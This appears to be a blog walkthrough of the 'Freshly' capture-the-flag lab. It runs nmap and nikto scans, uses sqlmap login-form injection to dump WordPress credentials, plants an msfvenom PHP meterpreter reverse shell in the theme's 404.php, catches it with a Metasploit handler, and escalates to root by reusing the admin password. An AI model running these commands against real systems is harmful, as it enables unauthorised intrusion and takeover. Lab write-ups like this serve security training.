Here we come with a new article which will all be about a
penetration testing challenge called FRESHLY. The goal of this challenge is to
break into the machine via the web and find the secret hidden in a sensitive
file. It’s an easy lab… let’s get started with it and access it.
Download from here
Breaching Methodology
·
Network Scanning (Nmap)
·
Recon (Nikto)
·
Login Form Based SQL Injection
·
Abusing wordpress
·
Generate PHP Backdoor (Msfvenom)
·
Upload and execute a backdoor
·
Reverse connection (Metasploit)
·
Take root access
Let’s Start!!
So to start with it firstly we have to find out the IP of
FRESHLY. For that type the netdiscover command
in terminal of Kali. It will show each IP present in our network.
Now we have target IP: 192.168.1.112 so let’s scan
it with aggressive scan (-A).
nmap -p- -A 192.168.1.112
This shows all open ports: 80, 8080, 443.
As we can see 80 port is open so we will open target IP
in our browser to find out what’s in there as our next clue.
Next we will apply nikto command to it. Nitko command
will help us to gather information like its files and all the other major stuff
that we ought to know about our target. So, therefore, type: nikto -h [host URL.
After scanning it shows that there is a login.php page
found. So open it in a browser with target IP
Since we don’t know the exact username and password
therefore we have used SQLMAP for login form based injection for retrieving the
database name and login credential by executing following command.
sqlmap -u http://192.168.1.6/login.php ‘’ --form
–risk 3 --level 3 –dbs
From sqlmap result we came to that the name of database
could be“wordpress8080”, so now using sqlmap again fetch username and password
from that database i.e. wordpress8080
Alright we have achieved our first step by finding out
user and password for wordpress.
User = admin
Password = SuperSecretPassword
Earlier we have already found out our open
ports so use one of not used ports to open in browser ie.8080
Cool…See what you have got…. Now click on this link and
you are all set for further result.
Candy goodness!!!!! It’s our wordpress page. So
let’s get on to other step by opening wordpress login page and entering the
credentials we found out i.e.
User= admin
Password= SuperSecretPassword
Once you have logged in, make the malicious file that you
got to upload in it. Generate code through msfvenom command:
msfvenom –p php/meterpreter/reverse_tcp
lhost=192.168.1.108 lport=4444 –f raw
Side by side in other terminal open metasploit and run
multi handler.
From generated php raw file copy the code from to die().
As we want to read a file on the system, let’s put some PHP code in the theme:
We go to Appearance -> themes -> 404.php and add some
PHP code in order to execute it,
Meanwhile, return to the Metasploit terminal and wait for
the metepreter session by exploiting multi handler.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload
php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost
192.168.1.108
msf exploit(multi/handler) set lport 4444
msf exploit(multi/handler) exploit
From given below image you can observe Meterpreter
session1, now start penetrating for accessing root privilege. Then to
access proper TTY shell we had import python one line script by typing
following:
python -c 'import
pty;pty.spawn("/bin/bash")'
For getting root access, account credential reuse from
the WordPress admin password SuperSecretPassword that allowed su – to escalate
privileges.
0 comments:
Post a Comment